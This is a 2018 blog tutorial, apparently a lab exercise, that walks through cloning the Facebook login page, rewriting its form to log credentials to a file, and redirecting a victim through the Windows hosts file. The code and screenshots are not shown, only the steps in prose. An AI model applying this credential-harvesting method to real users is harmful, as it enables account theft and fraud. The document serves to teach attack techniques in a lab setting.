Monday, April 2, 2018

Phishing (I) - Local redirection and Remote hosts file manipulation


- Layout for this exercise:


1 - Introduction

- Phishing is the attempt to obtain sensitive information such as usernames, passwords, or credit card details for malicious reasons by disguising as a trustworthy entity in an electronic communication:

- The word is a neologism created as a homophone of fishing due to the similarity of using a bait in an attempt to catch a victim. 

- Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter personal information at a fake website, the look and feel of which are identical to the legitimate one and the only difference is the URL of the website in concern.

- Phishing is an example of social engineering techniques used to deceive users, and exploits weaknesses in current web security.

- Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

2 - Creating a fake web page

- The goal of this exercise is to create a fake web page identical to the Facebook home page

- The victim will connect to the fake page believing that he is connected to the real Facebook home page, and he will enter his credentials (email/password) innocently.

- The attacker will redirect the credentials to a log file of his interest (log.txt), so that he will appropriate such credentials and could make malicious use of them.

- Of course, this exercise could be extended to any type of website, such as social networks, banking, insurance, business, etc ...

- First of all, let's backup all the XAMPP files (xampp/htdocs from the attacker machine Windows 10) to a safe place, because we are going to replace it with a new web content:

- Now, going to let's click Save Page from the browser (Firefox in this case) and download the whole web page to the folder xampp/htdocs of the attacker machine Windows 10 :

- Renaming the downloaded content to index.html, this will be the home page of the fake website:

- Now, the attacker Windows 10 holds a copy of the Facebook home page at its xampp/htdocs folder:

3 - Local redirection

- Then, the attacker writes the file mail.php (storing it at xmapp/htdocs), whose purpose is to redirect any user input to the text file log.txt:

- Let's notice the line where log.txt is open and created:

- Opening index.html with Notepad:

- Finding action=, the original action is replaced with action="mail.php", which will send the user's input to the text file log.txt:

- Now, let's try locally the fake web page and the bait, writing localhost at the browser, and entering some test credentials, for instance:
password: passwordforjohndoe

- A new log.txt is created immediately, where we can find the test credentials successfully harvested:

4 - Remote Hosts file manipulation

- To  test that the fake web page works remotely, let's connect the victim Windows 7 to the attacker's IP (, entering some credentials, and finally checking that the attacker is able again to harvest a remote user's credentials:

- Now we have achieved a greater degree of effectiveness in the attack, because we have harvested the victim's credentials remotely, not just locally.

- However, this scenario as described before is unlikely to happen in the real world, because a normal connection to from the victim would direct to the real Facebook home page, not to the fake one.

- How to achieve that the victim connects to the fake web page instead of the real one?

- The answer is Hosts file manipulation.

- The plain text hosts file maps hostnames to IP addresses, containing lines of text consisting of an IP address in the first text field followed by one or more hostnames, being each field separated by white spaces.

- The hosts file assists in addressing network nodes in a computer network, serving the function of translating human-friendly hostnames into numeric IP addresses, that identify and locate a host in anetwork.

- The other method to achieve the same result is the well-known Domain Name System (DNS).

- Unlike remote DNS resolvers, the hosts file is under the direct control of the local computer's administrator, so it can be manipulated remotely for instance as part of a post-exploitation process.

- Some examples of altering files remotely when post-exploitating a system:

- So taking for granted that the attacker has got access to altering files remotely (once the victim's machine has been exploitated), let's open the hosts file following this path:

C: > Windows > System32 > drivers > etc > hosts

- Adding a new line, what relates in a malicious way the attacker's IP to the website

- Now, when the victim Windows 7 connects to, the attacker is able again to harvest the remote user's credentials.

- The explanation is that the new hosts file at the victim machine redirects the connection to the IP (where the fake web page is served), instead to the real Facebook home page: